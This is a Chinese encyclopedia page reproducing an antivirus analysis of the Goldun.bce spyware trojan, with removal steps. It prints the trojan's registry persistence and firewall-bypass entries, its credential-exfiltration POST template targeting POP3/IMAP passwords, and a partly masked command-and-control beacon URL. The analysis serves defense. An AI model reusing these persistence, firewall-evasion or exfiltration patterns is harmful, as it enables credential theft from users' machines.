“Trojan.Spy.Win32.Goldun.bce”的意思、由来-中文百科全书

病毒标签

病毒名称： Trojan-Spy.Win32.Goldun.bce

病毒类型：蠕虫

文件 MD5： 1FFCB1EA024C228ADE6D8DAD681C6ED7

公开范围：完全公开

危害等级： 4

文件长度： 33,398 字节

感染系统： Windows98以上版本

开发工具： UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

病毒运行后添加注册表启动项，衍生病毒文件gzipmod.dll、vbagz.sys到%System32%目录下，该病毒调用系统进程rundll32.exe，并将gzipmod.dll、vbagz.sys以句柄的形式注入其中，添加注册表躲避系统自带防火墙，创建病毒注册表服务，病毒运行之后删除自身文件创造了互斥体防止病毒多次运行，病毒驱动通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk，并遍历该驱动创建的所有设备对象，该驱动记录这些设备对象的地址用来隐藏病毒衍生的文件，检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现，连接网络隐藏打开地址，收集有关的电子邮件用户端使用受影响的系统。

行为分析

本地行为

1、文件运行后会释放以下文件

%system32%\\gzipmod.dll

%system32%\\vbagz.sys

2、添加注册表项，创建病毒服务

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\

SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\

AuthorizedApplications\\List\\C:\\WINDOWS\\system32\\rundll32.exe

值: 字符串: "C:\\WINDOWS\\system32\\rundll32.exe:*:Enabled:rundll32"

描述：添加注册表躲避系统自带防火墙

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\

Winlogon\otify\\gzipmod\\DllName

值: 字符串: "gzipmod.dll."

描述：添加注册表启动项

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\DisplayName

值: 字符串: "VBA PnP Driver"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\ImagePath

值: 字符串: "system32\\vbagz.sys."

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\Start

值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\Type

值: DWORD: 1 (0x1)

描述：添加病毒服务

3、创建rundll32.exe进程将病毒DLL文件注入到该进程中，创建病毒注册表服务，病毒运行之后删除自身文件。

4、病毒驱动文件通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk，并遍历该驱动创建的所有设备对象，该驱动记录这些设备对象的地址用来在将来进行文件隐藏操作时用，检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现，创建以下驱动设备：

dprot

emulx86

fprot

itcoe

klite

ltppd

wlite

x86emul

xprot

5、一旦执行，DLL文件试图删除该文件如下（未实现）：

%Documents and Settings%\\所有用户\\开始菜单\\程序\\启动\ewrnj.exe

6、创造了互斥体名为：“trmirmtx”，防止病毒多次运行。

7、收集有关的电子邮件信息（未实现）：

1000B07E=mzipmod.1000B07E (ASCII "POST /%s?dt=0&id=%u HTTP/1.0

User-Agent: %s

Host: %s

Content-Length: %u

Content-Type: multipart/form-data; boundary=---------------------------71438020933

Connection: Keep-Alive

Pragma: no-cache

---------------)

\\-----------------------------71438020933\\Content-Disposition: form-data; name="url"\\\\

\\-----------------------------71438020933\\Content-Disposition: form-data; name="stb"\\\\

\\-----------------------------71438020933\\Content-Disposition: form-data; name="frm"\\\\

\\-----------------------------71438020933\\Content-Disposition: form-data; name="cpn"\\\\

-----------------------------71438020933\\Content-Disposition: form-data; name="mydata"; filename="%u%u%s"\\Content-Type: application/octet-stream\\\\

POP3 Password2

POP3 Server

POP3 User Name

IMAP Password2

IMAP Server

IMAP User Name

网络行为

病毒运行后向195.93.219.***发送GET信息：

GET os****.net/222/data.php?trackid=706172616D3D636D64266C616E673D2669643D32323232

267368656C6C3D3026736F636B73706F72743D36303532267665723D392668747470706F72743D3630

353126757074696D656D3D3426757074696D65683D30267569643D323844373032323632313 6463837443333 HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 2600.xpsp.11894-27197)

Host: oslikinet

Connection: Keep-Alive

该连接已加密，解密后得到：

Os****.net/222/data.php?trackid=param=cmd&lang=&id=2222&shell=0&socksport

=6052&ver=9&httpport=6051&uptimem=4&uptimeh=0&uid=28D70226216F87D33

经分析此连接已失效

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。

%Windir% WINDODWS所在目录

%DriveLetter%　逻辑驱动器根目录

%ProgramFiles%　系统程序默认安装目录

%HomeDrive% 当前启动的系统的所在分区

%Documents and Settings% 当前用户文档根目录

%Temp% \\Documents and Settings

\\当前用户\\Local Settings\\Temp

%System32% 系统的 System32文件夹

Windows2000/NT中默认的安装路径是C:\\Winnt\\System32

windows95/98/me中默认的安装路径是%WINDOWS%\\System

windowsXP中默认的安装路径是%system32%

清除方案

1、使用安天防线可彻底清除此病毒(推荐)。

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

（1）先打开Atool工具结束.rundll32.exe进程。

（2）使用Atool工具删除病毒衍生的文件

%system32%\\gzipmod.dll

%system32%\\vbagz.sys

（3）删除病毒添加的注册表项

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\

FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\C:\\WINDOWS\\system32\\rundll32.exe

删除List键下的键值C:\\WINDOWS\\system32\\rundll32.exe

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\otify\\gzipmod\\DllName

删除Notify键下的gzipmod主键值

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services

删除Services键下vbagz主键值

词条	Trojan.Spy.Win32.Goldun.bce
释义	Trojan.Spy.Win32.Goldun.bce蠕虫病毒，该病毒为ecard病毒变种，连接网络后，获取下载列表，下载病毒文件等。盗取用户“ftp”、“outlook”、 “Firefox”、“ICQ”、“MSN”、“AOL”和“YAHOO”等会员帐户的登陆帐号与登陆密码等信息，监听“E-Gold”的加密连接，获取用户登陆信息；将窃取到的这些机密信息资料发送到指定地址。病毒标签病毒描述行为分析(本地行为网络行为) 清除方案病毒标签病毒名称： Trojan-Spy.Win32.Goldun.bce 病毒类型：蠕虫文件 MD5： 1FFCB1EA024C228ADE6D8DAD681C6ED7 公开范围：完全公开危害等级： 4 文件长度： 33,398 字节感染系统： Windows98以上版本开发工具： UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 病毒描述病毒运行后添加注册表启动项，衍生病毒文件gzipmod.dll、vbagz.sys到%System32%目录下，该病毒调用系统进程rundll32.exe，并将gzipmod.dll、vbagz.sys以句柄的形式注入其中，添加注册表躲避系统自带防火墙，创建病毒注册表服务，病毒运行之后删除自身文件创造了互斥体防止病毒多次运行，病毒驱动通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk，并遍历该驱动创建的所有设备对象，该驱动记录这些设备对象的地址用来隐藏病毒衍生的文件，检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现，连接网络隐藏打开地址，收集有关的电子邮件用户端使用受影响的系统。行为分析本地行为 1、文件运行后会释放以下文件 %system32%\\gzipmod.dll %system32%\\vbagz.sys 2、添加注册表项，创建病毒服务 HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\ SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\ AuthorizedApplications\\List\\C:\\WINDOWS\\system32\\rundll32.exe 值: 字符串: "C:\\WINDOWS\\system32\\rundll32.exe::Enabled:rundll32" 描述：添加注册表躲避系统自带防火墙 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\ Winlogon\otify\\gzipmod\\DllName 值: 字符串: "gzipmod.dll." 描述：添加注册表启动项 HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\DisplayName 值: 字符串: "VBA PnP Driver" HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\ImagePath 值: 字符串: "system32\\vbagz.sys." HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\Start 值: DWORD: 1 (0x1) HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\vbagz\\Type 值: DWORD: 1 (0x1) 描述：添加病毒服务 3、创建rundll32.exe进程将病毒DLL文件注入到该进程中，创建病毒注册表服务，病毒运行之后删除自身文件。 4、病毒驱动文件通过 nt!ObReferenceObjectByName 打开磁盘驱动 DriverDisk，并遍历该驱动创建的所有设备对象，该驱动记录这些设备对象的地址用来在将来进行文件隐藏操作时用，检测路由器支持的路由协议功能、保护该病毒衍生的文件不被查找、发现，创建以下驱动设备： dprot emulx86 fprot itcoe klite ltppd wlite x86emul xprot 5、一旦执行，DLL文件试图删除该文件如下（未实现）： %Documents and Settings%\\所有用户\\开始菜单\\程序\\启动\ewrnj.exe 6、创造了互斥体名为：“trmirmtx”，防止病毒多次运行。 7、收集有关的电子邮件信息（未实现）： 1000B07E=mzipmod.1000B07E (ASCII "POST /%s?dt=0&id=%u HTTP/1.0 User-Agent: %s Host: %s Content-Length: %u Content-Type: multipart/form-data; boundary=---------------------------71438020933 Connection: Keep-Alive Pragma: no-cache ---------------) \\-----------------------------71438020933\\Content-Disposition: form-data; name="url"\\\\ \\-----------------------------71438020933\\Content-Disposition: form-data; name="stb"\\\\ \\-----------------------------71438020933\\Content-Disposition: form-data; name="frm"\\\\ \\-----------------------------71438020933\\Content-Disposition: form-data; name="cpn"\\\\ -----------------------------71438020933\\Content-Disposition: form-data; name="mydata"; filename="%u%u%s"\\Content-Type: application/octet-stream\\\\ POP3 Password2 POP3 Server POP3 User Name IMAP Password2 IMAP Server IMAP User Name 网络行为病毒运行后向195.93.219.发送GET信息： GET os.net/222/data.php?trackid=706172616D3D636D64266C616E673D2669643D32323232 267368656C6C3D3026736F636B73706F72743D36303532267665723D392668747470706F72743D3630 353126757074696D656D3D3426757074696D65683D30267569643D323844373032323632313 6463837443333 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 2600.xpsp.11894-27197) Host: oslikinet Connection: Keep-Alive 该连接已加密，解密后得到： Os**.net/222/data.php?trackid=param=cmd&lang=&id=2222&shell=0&socksport =6052&ver=9&httpport=6051&uptimem=4&uptimeh=0&uid=28D70226216F87D33 经分析此连接已失效注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。 %Windir% WINDODWS所在目录 %DriveLetter%　逻辑驱动器根目录 %ProgramFiles%　系统程序默认安装目录 %HomeDrive% 当前启动的系统的所在分区 %Documents and Settings% 当前用户文档根目录 %Temp% \\Documents and Settings \\当前用户\\Local Settings\\Temp %System32% 系统的 System32文件夹 Windows2000/NT中默认的安装路径是C:\\Winnt\\System32 windows95/98/me中默认的安装路径是%WINDOWS%\\System windowsXP中默认的安装路径是%system32% 清除方案 1、使用安天防线可彻底清除此病毒(推荐)。 2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。（1）先打开Atool工具结束.rundll32.exe进程。（2）使用Atool工具删除病毒衍生的文件 %system32%\\gzipmod.dll %system32%\\vbagz.sys （3）删除病毒添加的注册表项 HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\ FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\C:\\WINDOWS\\system32\\rundll32.exe 删除List键下的键值C:\\WINDOWS\\system32\\rundll32.exe HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\otify\\gzipmod\\DllName 删除Notify键下的gzipmod主键值 HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services 删除Services键下vbagz主键值
随便看	肾脏损害肾脏损伤肾脏外伤肾脏纤维化肾脏纤维化治疗肾脏相关激素测定肾脏小血管炎肾脏炎肾脏移植肾脏中风肾脏肿瘤肾脏肿瘤与膀胱疾病肾盏憩室肾胀肾脂肪瘤肾脂肪囊肾之府肾志恐肾中风肾肿瘤肾周脓肿肾周围脓肿肾周围炎肾主耳肾主骨

病毒标签

病毒描述

行为分析

本地行为

网络行为

清除方案